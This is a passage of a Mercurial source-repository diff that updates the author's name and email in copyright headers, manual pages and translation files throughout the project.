There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"(С) 2005-2014 Matt Mackall и другие.\n" +"(С) 2005-2014 Olivia Mackall и другие.\n" "Это свободное ПО; условия распространения см. в исходном коде.\n" "НИКАКИХ ГАРАНТИЙ НЕ ПРЕДОСТАВЛЯЕТСЯ, в том числе на пригодность для\n" "коммерческого использования и для решения конкретных задач.\n" @@ -21807,7 +21807,7 @@ # NOT SURE should this be translated? msgid "" -":Author: Matt Mackall <mpm@selenic.com>\n" +":Author: Olivia Mackall <olivia@selenic.com>\n" ":Organization: Mercurial\n" ":Manual section: 1\n" ":Manual group: Mercurial Manual" @@ -22000,11 +22000,11 @@ msgid "" "Author\n" "\"\"\"\"\"\"\n" -"Written by Matt Mackall <mpm@selenic.com>" +"Written by Olivia Mackall <olivia@selenic.com>" msgstr "" "Автор\n" "\"\"\"\"\"\n" -"Matt Mackall <mpm@selenic.com>" +"Olivia Mackall <olivia@selenic.com>" msgid "" "Resources\n" @@ -22024,13 +22024,13 @@ msgid "" "Copying\n" "\"\"\"\"\"\"\"\n" -"Copyright (C) 2005-2014 Matt Mackall.\n" +"Copyright (C) 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Копирование\n" "\"\"\"\"\"\"\"\"\"\"\"\n" -"(C) 2005-2014 Matt Mackall.\n" +"(C) 2005-2014 Olivia Mackall.\n" "Свободное использование этого ПО возможно в соответствии с \n" "Универсальной Общественной Лицензией GNU (GNU GPL) версии 2 или выше." @@ -22068,8 +22068,8 @@ "=====\n" "Vadim Gelfer <vadim.gelfer@gmail.com>" -msgid "Mercurial was written by Matt Mackall <mpm@selenic.com>." -msgstr "Mercurial написан Matt Mackall <mpm@selenic.com>." +msgid "Mercurial was written by Olivia Mackall <olivia@selenic.com>." +msgstr "Mercurial написан Olivia Mackall <olivia@selenic.com>." 
msgid "" "See Also\n" @@ -22084,14 +22084,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2006 Vadim Gelfer.\n" -"Mercurial is copyright 2005-2014 Matt Mackall.\n" +"Mercurial is copyright 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Копирование\n" "===========\n" "Правами на данную страницу обладает (с) 2006 Vadim Gelfer\n" -"Права на Mercurial принадлежат (с) 2005-2014 Matt Mackall.\n" +"Права на Mercurial принадлежат (с) 2005-2014 Olivia Mackall.\n" "Свободное использование этого ПО возможно в соответствии с \n" "Универсальной Общественной Лицензией GNU (GNU GPL) версии 2 или выше." @@ -22346,14 +22346,14 @@ "Copying\n" "=======\n" "This manual page is copyright 2005 Bryan O'Sullivan.\n" -"Mercurial is copyright 2005-2014 Matt Mackall.\n" +"Mercurial is copyright 2005-2014 Olivia Mackall.\n" "Free use of this software is granted under the terms of the GNU General\n" "Public License version 2 or any later version." msgstr "" "Копирование\n" "===========\n" "Правами на данную страницу обладает (с) 2005 Bryan O'Sullivan\n" -"Права на Mercurial принадлежат (с) 2005-2014 Matt Mackall.\n" +"Права на Mercurial принадлежат (с) 2005-2014 Olivia Mackall.\n" "Свободное использование этого ПО возможно в соответствии с \n" "Универсальной Общественной Лицензией GNU (GNU GPL) версии 2 или выше." diff --git a/i18n/sv.po b/i18n/sv.po --- a/i18n/sv.po +++ b/i18n/sv.po @@ -1,6 +1,6 @@ # Swedish translation for Mercurial # Svensk översättning för Mercurial -# Copyright (C) 2009-2012 Matt Mackall and others +# Copyright (C) 2009-2012 Olivia Mackall and others # # Translation dictionary: # @@ -12413,11 +12413,11 @@ msgstr "(se http://mercurial.selenic.com för mer information)" msgid "" -"Copyright (C) 2005-2012 Matt Mackall and others\n" +"Copyright (C) 2005-2012 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. 
There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2012 Matt Mackall och andra\n" +"Copyright (C) 2005-2012 Olivia Mackall och andra\n" "Detta är fri mjukvara; se källkoden för kopieringsvillkor. Det ges INGEN\n" "garanti; inte ens för SÄLJBARHET eller ATT PASSA FÖR ETT VISST ÄNDAMÅL.\n" diff --git a/i18n/zh_CN.po b/i18n/zh_CN.po --- a/i18n/zh_CN.po +++ b/i18n/zh_CN.po @@ -7409,12 +7409,12 @@ msgid "" "\n" -"Copyright (C) 2005-2010 Matt Mackall <mpm@selenic.com> and others\n" +"Copyright (C) 2005-2010 Olivia Mackall <olivia@selenic.com> and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" "\n" -"版权所有 (C) 2005-2010 Matt Mackall <mpm@selenic.com> 和其他人。\n" +"版权所有 (C) 2005-2010 Olivia Mackall <olivia@selenic.com> 和其他人。\n" "这是自由软件,具体参见版权条款。这里没有任何担保,甚至没有适合\n" "特定目的的隐含的担保。\n" diff --git a/i18n/zh_TW.po b/i18n/zh_TW.po --- a/i18n/zh_TW.po +++ b/i18n/zh_TW.po @@ -1,5 +1,5 @@ # Traditional Chinese translation for Mercurial -# Copyright (C) 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright (C) 2009 Olivia Mackall <olivia@selenic.com> and others # This file is distributed under the same license as the Mercurial package. # Chia-Huan Wu <willie.tw@gmail.com>, 2009. # @@ -8191,7 +8191,7 @@ msgstr "\tSee 'hg help urls' for more information." msgid "" -"Copyright (C) 2005-2010 Matt Mackall and others\n" +"Copyright (C) 2005-2010 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. 
There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" diff --git a/mercurial/ancestor.py b/mercurial/ancestor.py --- a/mercurial/ancestor.py +++ b/mercurial/ancestor.py @@ -1,6 +1,6 @@ # ancestor.py - generic DAG ancestor algorithm for mercurial # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/bdiff.c b/mercurial/bdiff.c --- a/mercurial/bdiff.c +++ b/mercurial/bdiff.c @@ -1,7 +1,7 @@ /* bdiff.c - efficient binary diff extension for Mercurial - Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> + Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/branchmap.py b/mercurial/branchmap.py --- a/mercurial/branchmap.py +++ b/mercurial/branchmap.py @@ -1,6 +1,6 @@ # branchmap.py - logic to computes, maintain and stores branchmap for local repo # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/cacheutil.py b/mercurial/cacheutil.py --- a/mercurial/cacheutil.py +++ b/mercurial/cacheutil.py @@ -1,6 +1,6 @@ # scmutil.py - Mercurial core utility functions # -# Copyright Matt Mackall <mpm@selenic.com> and other +# Copyright Olivia Mackall <olivia@selenic.com> and other # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/cext/bdiff.c b/mercurial/cext/bdiff.c --- a/mercurial/cext/bdiff.c +++ b/mercurial/cext/bdiff.c @@ -1,7 +1,7 @@ /* bdiff.c - efficient binary diff extension for Mercurial - Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> + Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/cext/charencode.c b/mercurial/cext/charencode.c --- a/mercurial/cext/charencode.c +++ b/mercurial/cext/charencode.c @@ -1,7 +1,7 @@ /* charencode.c - miscellaneous character encoding - Copyright 2008 Matt Mackall <mpm@selenic.com> and others + Copyright 2008 Olivia Mackall <olivia@selenic.com> and others This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/cext/mpatch.c b/mercurial/cext/mpatch.c --- a/mercurial/cext/mpatch.c +++ b/mercurial/cext/mpatch.c @@ -14,7 +14,7 @@ allocation of intermediate Python objects. Working memory is about 2x the total number of hunks. - Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> + Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/cext/osutil.c b/mercurial/cext/osutil.c --- a/mercurial/cext/osutil.c +++ b/mercurial/cext/osutil.c @@ -1,7 +1,7 @@ /* osutil.c - native operating system services - Copyright 2007 Matt Mackall and others + Copyright 2007 Olivia Mackall and others This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. 
diff --git a/mercurial/cext/parsers.c b/mercurial/cext/parsers.c --- a/mercurial/cext/parsers.c +++ b/mercurial/cext/parsers.c @@ -1,7 +1,7 @@ /* parsers.c - efficient content parsing - Copyright 2008 Matt Mackall <mpm@selenic.com> and others + Copyright 2008 Olivia Mackall <olivia@selenic.com> and others This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/cext/revlog.c b/mercurial/cext/revlog.c --- a/mercurial/cext/revlog.c +++ b/mercurial/cext/revlog.c @@ -1,7 +1,7 @@ /* parsers.c - efficient content parsing - Copyright 2008 Matt Mackall <mpm@selenic.com> and others + Copyright 2008 Olivia Mackall <olivia@selenic.com> and others This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -1,6 +1,6 @@ # changegroup.py - Mercurial changegroup manipulation functions # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/changelog.py b/mercurial/changelog.py --- a/mercurial/changelog.py +++ b/mercurial/changelog.py @@ -1,6 +1,6 @@ # changelog.py - changelog class for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/cmdutil.py b/mercurial/cmdutil.py --- a/mercurial/cmdutil.py +++ b/mercurial/cmdutil.py @@ -1,6 +1,6 @@ # cmdutil.py - help for command processing in mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -1,6 +1,6 @@ # commands.py - command processing for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -7891,7 +7891,7 @@ ) license = _( b"(see https://mercurial-scm.org for more information)\n" - b"\nCopyright (C) 2005-2021 Matt Mackall and others\n" + b"\nCopyright (C) 2005-2021 Olivia Mackall and others\n" b"This is free software; see the source for copying conditions. " b"There is NO\nwarranty; " b"not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" diff --git a/mercurial/commandserver.py b/mercurial/commandserver.py --- a/mercurial/commandserver.py +++ b/mercurial/commandserver.py @@ -1,6 +1,6 @@ # commandserver.py - communicate with Mercurial's API over a pipe # -# Copyright Matt Mackall <mpm@selenic.com> +# Copyright Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/config.py b/mercurial/config.py --- a/mercurial/config.py +++ b/mercurial/config.py @@ -1,6 +1,6 @@ # config.py - configuration parsing for Mercurial # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/context.py b/mercurial/context.py --- a/mercurial/context.py +++ b/mercurial/context.py @@ -1,6 +1,6 @@ # context.py - changeset and file context objects for mercurial # -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -1,7 +1,7 @@ # coding: utf8 # copies.py - copy detection for Mercurial # -# Copyright 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/dagop.py b/mercurial/dagop.py --- a/mercurial/dagop.py +++ b/mercurial/dagop.py @@ -1,6 +1,6 @@ # dagop.py - graph ancestry and topology algorithm for revset # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -1,6 +1,6 @@ # debugcommands.py - command processing for debug* commands # -# Copyright 2005-2016 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2016 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/destutil.py b/mercurial/destutil.py --- a/mercurial/destutil.py +++ b/mercurial/destutil.py @@ -1,6 +1,6 @@ # destutil.py - Mercurial utility function for command destination # -# Copyright Matt Mackall <mpm@selenic.com> and other +# Copyright Olivia Mackall <olivia@selenic.com> and other # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/diffhelper.py b/mercurial/diffhelper.py --- a/mercurial/diffhelper.py +++ b/mercurial/diffhelper.py @@ -1,6 +1,6 @@ # diffhelper.py - helper routines for patch # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/dirstate.py b/mercurial/dirstate.py --- a/mercurial/dirstate.py +++ b/mercurial/dirstate.py @@ -1,6 +1,6 @@ # dirstate.py - working directory tracking for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/dirstateguard.py b/mercurial/dirstateguard.py --- a/mercurial/dirstateguard.py +++ b/mercurial/dirstateguard.py @@ -1,6 +1,6 @@ # dirstateguard.py - class to allow restoring dirstate after failure # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/discovery.py b/mercurial/discovery.py --- a/mercurial/discovery.py +++ b/mercurial/discovery.py @@ -1,6 +1,6 @@ # discovery.py - protocol changeset discovery functions # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/dispatch.py b/mercurial/dispatch.py --- a/mercurial/dispatch.py +++ b/mercurial/dispatch.py @@ -1,6 +1,6 @@ # dispatch.py - command dispatching for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/encoding.py b/mercurial/encoding.py --- a/mercurial/encoding.py +++ b/mercurial/encoding.py @@ -1,6 +1,6 @@ # encoding.py - character transcoding support for Mercurial # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/error.py b/mercurial/error.py --- a/mercurial/error.py +++ b/mercurial/error.py @@ -1,6 +1,6 @@ # error.py - Mercurial exceptions # -# Copyright 2005-2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/exchange.py b/mercurial/exchange.py --- a/mercurial/exchange.py +++ b/mercurial/exchange.py @@ -1,6 +1,6 @@ # exchange.py - utility to exchange data between repos. # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/extensions.py b/mercurial/extensions.py --- a/mercurial/extensions.py +++ b/mercurial/extensions.py @@ -1,6 +1,6 @@ # extensions.py - extension handling for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/fancyopts.py b/mercurial/fancyopts.py --- a/mercurial/fancyopts.py +++ b/mercurial/fancyopts.py @@ -1,6 +1,6 @@ # fancyopts.py - better command line parsing # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/filelog.py b/mercurial/filelog.py --- a/mercurial/filelog.py +++ b/mercurial/filelog.py @@ -1,6 +1,6 @@ # filelog.py - file history class for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/filemerge.py b/mercurial/filemerge.py --- a/mercurial/filemerge.py +++ b/mercurial/filemerge.py @@ -1,6 +1,6 @@ # filemerge.py - file-level merge handling for Mercurial # -# Copyright 2006, 2007, 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/fileset.py b/mercurial/fileset.py --- a/mercurial/fileset.py +++ b/mercurial/fileset.py @@ -1,6 +1,6 @@ # fileset.py - file set queries for mercurial # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/filesetlang.py b/mercurial/filesetlang.py --- a/mercurial/filesetlang.py +++ b/mercurial/filesetlang.py @@ -1,6 +1,6 @@ # filesetlang.py - parser, tokenizer and utility for file set language # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/formatter.py b/mercurial/formatter.py --- a/mercurial/formatter.py +++ b/mercurial/formatter.py @@ -1,6 +1,6 @@ # formatter.py - generic output formatting for mercurial # -# Copyright 2012 Matt Mackall <mpm@selenic.com> +# Copyright 2012 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/grep.py b/mercurial/grep.py --- a/mercurial/grep.py +++ b/mercurial/grep.py @@ -1,6 +1,6 @@ # grep.py - logic for history walk and grep # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hbisect.py b/mercurial/hbisect.py --- a/mercurial/hbisect.py +++ b/mercurial/hbisect.py @@ -1,6 +1,6 @@ # changelog bisection for mercurial # -# Copyright 2007 Matt Mackall +# Copyright 2007 Olivia Mackall # Copyright 2005, 2006 Benoit Boissinot <benoit.boissinot@ens-lyon.org> # # Inspired by git bisect, extension skeleton taken from mq.py. diff --git a/mercurial/help.py b/mercurial/help.py --- a/mercurial/help.py +++ b/mercurial/help.py @@ -1,6 +1,6 @@ # help.py - help data for mercurial # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/hg-ssh.8.txt b/mercurial/helptext/hg-ssh.8.txt --- a/mercurial/helptext/hg-ssh.8.txt +++ b/mercurial/helptext/hg-ssh.8.txt @@ -52,7 +52,7 @@ Author """""" -Written by Matt Mackall <mpm@selenic.com> +Written by Olivia Mackall <olivia@selenic.com> Resources """"""""" @@ -64,7 +64,7 @@ Copying """"""" -Copyright (C) 2005-2016 Matt Mackall. 
+Copyright (C) 2005-2016 Olivia Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/hg.1.txt b/mercurial/helptext/hg.1.txt --- a/mercurial/helptext/hg.1.txt +++ b/mercurial/helptext/hg.1.txt @@ -6,7 +6,7 @@ Mercurial source code management system --------------------------------------- -:Author: Matt Mackall <mpm@selenic.com> +:Author: Olivia Mackall <olivia@selenic.com> :Organization: Mercurial :Manual section: 1 :Manual group: Mercurial Manual @@ -100,7 +100,7 @@ Author """""" -Written by Matt Mackall <mpm@selenic.com> +Written by Olivia Mackall <olivia@selenic.com> Resources """"""""" @@ -112,7 +112,7 @@ Copying """"""" -Copyright (C) 2005-2021 Matt Mackall. +Copyright (C) 2005-2021 Olivia Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/hgignore.5.txt b/mercurial/helptext/hgignore.5.txt --- a/mercurial/helptext/hgignore.5.txt +++ b/mercurial/helptext/hgignore.5.txt @@ -17,7 +17,7 @@ ====== Vadim Gelfer <vadim.gelfer@gmail.com> -Mercurial was written by Matt Mackall <mpm@selenic.com>. +Mercurial was written by Olivia Mackall <olivia@selenic.com>. See Also ======== @@ -26,7 +26,7 @@ Copying ======= This manual page is copyright 2006 Vadim Gelfer. -Mercurial is copyright 2005-2021 Matt Mackall. +Mercurial is copyright 2005-2021 Olivia Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/helptext/hgrc.5.txt b/mercurial/helptext/hgrc.5.txt --- a/mercurial/helptext/hgrc.5.txt +++ b/mercurial/helptext/hgrc.5.txt @@ -25,7 +25,7 @@ ====== Bryan O'Sullivan <bos@serpentine.com>. -Mercurial was written by Matt Mackall <mpm@selenic.com>. +Mercurial was written by Olivia Mackall <olivia@selenic.com>. 
See Also ======== @@ -34,7 +34,7 @@ Copying ======= This manual page is copyright 2005 Bryan O'Sullivan. -Mercurial is copyright 2005-2021 Matt Mackall. +Mercurial is copyright 2005-2021 Olivia Mackall. Free use of this software is granted under the terms of the GNU General Public License version 2 or any later version. diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1,6 +1,6 @@ # hg.py - repository classes for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/hgweb/__init__.py b/mercurial/hgweb/__init__.py --- a/mercurial/hgweb/__init__.py +++ b/mercurial/hgweb/__init__.py @@ -1,7 +1,7 @@ # hgweb/__init__.py - web interface to a mercurial repository # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005 Matt Mackall <mpm@selenic.com> +# Copyright 2005 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/common.py b/mercurial/hgweb/common.py --- a/mercurial/hgweb/common.py +++ b/mercurial/hgweb/common.py @@ -1,7 +1,7 @@ # hgweb/common.py - Utility functions needed by hgweb_mod and hgwebdir_mod # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/hgweb_mod.py b/mercurial/hgweb/hgweb_mod.py --- a/mercurial/hgweb/hgweb_mod.py +++ b/mercurial/hgweb/hgweb_mod.py @@ -1,7 +1,7 @@ # hgweb/hgweb_mod.py - Web interface for a repository. 
# # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/hgwebdir_mod.py b/mercurial/hgweb/hgwebdir_mod.py --- a/mercurial/hgweb/hgwebdir_mod.py +++ b/mercurial/hgweb/hgwebdir_mod.py @@ -1,7 +1,7 @@ # hgweb/hgwebdir_mod.py - Web interface for a directory of repositories. # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/request.py b/mercurial/hgweb/request.py --- a/mercurial/hgweb/request.py +++ b/mercurial/hgweb/request.py @@ -1,7 +1,7 @@ # hgweb/request.py - An http request from either CGI or the standalone server. # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/server.py b/mercurial/hgweb/server.py --- a/mercurial/hgweb/server.py +++ b/mercurial/hgweb/server.py @@ -1,7 +1,7 @@ # hgweb/server.py - The standalone hg web server. # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/hgweb/webcommands.py b/mercurial/hgweb/webcommands.py --- a/mercurial/hgweb/webcommands.py +++ b/mercurial/hgweb/webcommands.py @@ -1,6 +1,6 @@ # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/webutil.py b/mercurial/hgweb/webutil.py --- a/mercurial/hgweb/webutil.py +++ b/mercurial/hgweb/webutil.py @@ -1,7 +1,7 @@ # hgweb/webutil.py - utility library for the web interface. # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hook.py b/mercurial/hook.py --- a/mercurial/hook.py +++ b/mercurial/hook.py @@ -1,6 +1,6 @@ # hook.py - hook support for mercurial # -# Copyright 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/httpconnection.py b/mercurial/httpconnection.py --- a/mercurial/httpconnection.py +++ b/mercurial/httpconnection.py @@ -1,6 +1,6 @@ # httpconnection.py - urllib2 handler for new http support # -# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com> # Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # Copyright 2011 Google, Inc. 
